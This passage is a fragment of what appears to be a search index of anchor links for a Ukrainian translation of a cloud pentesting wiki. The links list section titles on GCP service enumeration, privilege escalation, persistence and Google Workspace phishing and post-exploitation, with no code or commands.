services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#gcp---composer-enum","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#Основна-інформація","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#Перерахування","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#gcp---Контейнери-та-gke-enum","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#Контейнери","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#node-pools","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#kubernetes","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#Підвищення-привілеїв-tls-bootstrap","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#Секрети-в-kubelet-api","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#gcp----dataproc-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#Основна-інформація","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#Компоненти","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#Перерахування","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#Перерахування-кластерів","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#Перерахунок-завдань","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---dns-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---cloud-dns","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#gcp---filestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#Основна-інформація","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#Зєднання","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#Резервні-копії","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#Шифрування","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#Перерахування","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#Підвищення-привілеїв-та-постексплуатація","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#Постійність","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#gcp---firebase-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#firebase","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#authenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#Інформація-доступу-з-appid-та-api-key","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#Посилання","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#gcp---firestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#cloud-firestore","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#gcp---iam-Принципи-та-Перерахування-Політик-Організації","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#Облікові-записи-служб","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#Перерахування","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#Користувачі-та-Групи","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#Перерахування-1","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#iam","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#За-замовчуванням-дозволи","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#set-iam-policy-vs-add-iam-policy-binding","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#Перерахунок","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#cloudasset-iam-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#testiampermissions-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#org-policies","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc-1","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#gcp---kms-enum","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#kms","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Рівень-захисту-ключів","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Цілі-ключів","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Період-ротації-та-період-програмування-на-знищення","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Основна-версія","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Перерахування","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Підвищення-Привілеїв","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Після-Експлуатації","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Посилання","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#gcp---logging-enum","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#Основна-інформація","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#Потік-журналів","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#Конфігурації-підтримувані-gcp-logging","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#gcp---Перерахунок-memorystore","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#memorystore","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#gcp---Моніторинг-enum","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#Основна-інформація","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#Політики","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#Панелі-моніторингу","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#Канали","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#Снузери","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#Перерахування","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#Після-експлуатації","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#Посилання","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#gcp---pubsub-enum","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#snapshots--schemas","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#Підвищення-привілеїв-та-постексплуатація","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub-lite","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#Перерахування","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#gcp---secrets-manager-enum","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#secret-manager","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#Підвищення-привілеїв","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#Після-експлуатації","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#Постійність","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#Зловживання-ротацією","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#gcp---security-enum","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#Основна-інформація","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#Центр-команд-безпеки","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#Загрози","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#Перерахування","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#Постексплуатація","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#Виявлення-та-контроль","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#Захист-даних","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#Нульова-довіра","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#gcp---source-repositories-enum","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#offsec-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#open-in-cloud-shell","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#gcp---spanner-enum","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#cloud-spanner","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#gcp---stackdriver-enum","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#stackdriver-logging","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#Посилання","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#gcp---storage-enum","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#storage","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#storage-types","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#access-control","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#versioning","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#retention-policy","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#public-access","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#hmac-keys","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#Підвищення-Привілеїв","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#Неавтентифікований-Перелік","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#Після-Експлуатації","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#Персистентність","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#gcp---workflows-enum","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#Привілегії-та-Післяексплуатація","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#gcp--workspace-pivoting","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#З-gcp-до-gws","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Основи-делегування-на-рівні-домену","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Компрометація-існуючого-делегування","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Створення-нової-делегації-Постійність","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Створення-проекту-для-перерахунку-workspace","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Зловживання-обліковими-даними-gcloud","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Від-gws-до-gcp","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Доступ-до-привілейованих-користувачів-gcp","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Підвищення-привілеїв-google-groups","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Посилання","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#gcp---Розуміння-делегування-на-рівні-домену","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#Розуміння-делегування-на-рівні-домену","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#Делегування-на-рівні-домену-Під-капотом","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#gcp---Неавтентифіковане-перерахування-та-доступ","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#Виявлення-публічних-активів","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#Брутфорс-публічних-ресурсів","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#Баки-firebase-Додатки-та-Хмарні-функції","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#gcp---api-keys-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#api-keys","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#osint-техніки","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#Перевірка-походження-проекту-gcp---apikeyskeyslookup","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#Брутфорс-api-кінцевих-точок","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#gcp---app-engine-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#app-engine","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#Брутфорс-піддоменів","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#gcp---Артефактний-реєстр-без-аутентифікації","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#Артефактний-реєстр","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#Плутанина-залежностей","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#gcp---cloud-build-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloud-build","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloudbuildyml","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#pr-approvals","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#gcp---cloud-functions-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#brute-force-urls","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#enumerate-open-cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#gcp---cloud-run-Універсальний-Перелік","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#cloud-run","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#Перелік-Відкритих-cloud-run","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#gcp---cloud-sql-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#cloud-sql","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#gcp---compute-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#compute","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#ssrf---server-side-request-forgery","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#Вразливі-відкриті-сервіси","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#gcp---iam-Принципи-та-Організаційна-Неавторизована-Перерахунка","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#iam-та-gcp-Принципи","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#Чи-використовується-домен-у-workspace","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#Перерахунок-електронних-адрес-та-облікових-записів-служб","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#gcp---Перевірка-джерел-без-аутентифікації","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#Джерела","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#Компрометація-зовнішнього-репозиторію","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#gcp---storage-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#storage","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#public-bucket-brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#search-open-buckets-in-current-account","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#gcp---Підвищення-Привілеїв-Публічних-Бакетів","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#Підвищення-Привілеїв-Бакетів","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#Перевірка-Дозволів","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#Підвищення","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#Посилання","pentesting-cloud/workspace-security/index.html#gws---workspace-pentesting","pentesting-cloud/workspace-security/index.html#entry-points","pentesting-cloud/workspace-security/index.html#google-platforms-and-oauth-apps-phishing","pentesting-cloud/workspace-security/index.html#password-spraying","pentesting-cloud/workspace-security/index.html#post-exploitation","pentesting-cloud/workspace-security/index.html#gws-gcp-pivoting","pentesting-cloud/workspace-security/index.html#gws--gcpw--gcds--directory-sync-ad--entraid","pentesting-cloud/workspace-security/index.html#persistence","pentesting-cloud/workspace-security/index.html#account-compromised-recovery","pentesting-cloud/workspace-security/index.html#references","pentesting-cloud/workspace-security/gws-post-exploitation.html#gws---Постексплуатація","pentesting-cloud/workspace-security/gws-post-exploitation.html#Привілегії-google-groups","pentesting-cloud/workspace-security/gws-post-exploitation.html#Інформація-про-доступ-до-групової-пошти","pentesting-cloud/workspace-security/gws-post-exploitation.html#gcp--gws-Півотування","pentesting-cloud/workspace-security/gws-post-exploitation.html#takeout---Завантажити-все-що-google-знає-про-обліковий-запис","pentesting-cloud/workspace-security/gws-post-exploitation.html#vault---Завантажити-всі-дані-workspace-користувачів","pentesting-cloud/workspace-security/gws-post-exploitation.html#Завантаження-контактів","pentesting-cloud/workspace-security/gws-post-exploitation.html#cloudsearch","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-chat","pentesting-cloud/workspace-security/gws-post-exploitation.html#Видобуток-google-drive","pentesting-cloud/workspace-security/gws-post-exploitation.html#keep-notes","pentesting-cloud/workspace-security/gws-post-exploitation.html#Модифікація-app-scripts","pentesting-cloud/workspace-security/gws-post-exploitation.html#Адміністрування-workspace","pentesting-cloud/workspace-security/gws-post-exploitation.html#Посилання","pentesting-cloud/workspace-security/gws-persistence.html#gws---persistence","pentesting-cloud/workspace-security/gws-persistence.html#Постійність-у-gmail","pentesting-cloud/workspace-security/gws-persistence.html#Паролі-додатків","pentesting-cloud/workspace-security/gws-persistence.html#Зміна-2-fa-та-подібне","pentesting-cloud/workspace-security/gws-persistence.html#Постійність-через-oauth-apps","pentesting-cloud/workspace-security/gws-persistence.html#Постійність-через-делегування","pentesting-cloud/workspace-security/gws-persistence.html#Постійність-через-android-app","pentesting-cloud/workspace-security/gws-persistence.html#Постійність-через--app-scripts","pentesting-cloud/workspace-security/gws-persistence.html#Посилання","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gws---Атаки-синхронізації-workspace-gcpw-gcds-gps-Синхронізація-каталогу-з-ad-та-entraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcpw---google-credential-provider-for-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcsd---google-cloud-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gps---google-password-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#admin-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#gws---admin-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#Основна-інформація","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#З-adentraid---google-workspace--gcp","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#З-google-workspace---adentraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---google-cloud-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#Основна-інформація","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---Дискові-токени-та-облікові-дані-ad","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---Виведення-токенів-з-памяті","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---Генерація-токенів-доступу-з-токенів-оновлення","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---Сфери","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---google-credential-provider-for-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#Основна-інформація","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---mitm","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Відбиток","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Отримати-токени","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Оновлення-токенів-реєстру","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Токени-оновлення-диска","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Витяг-токенів-з-памяті-процесів","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Генерація-токенів-доступу-з-токенів-оновлення","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Сфери","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Відновлення-пароля-у-відкритому-вигляді","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#Посилання","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---google-password-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#Основна-інформація","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---Налаштування","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---Витяг-пароля-та-токена-з-диска","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---Витяг-токенів-з-памяті","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---Генерація-токенів-доступу-з-токенів-оновлення","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---Сфери","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#gws---google-platforms-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#generic-phishing-methodology","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-groups-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-chat-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-doc-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-calendar-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#app-scripts-redirect-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#app-scripts-oauth-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#oauth-apps-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#unverified-app-prompt","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#interesting-scopes","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#create-an-oauth-app","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#Посилання","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#gws---app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Створити-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Сценарій-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Створити-google-sheet-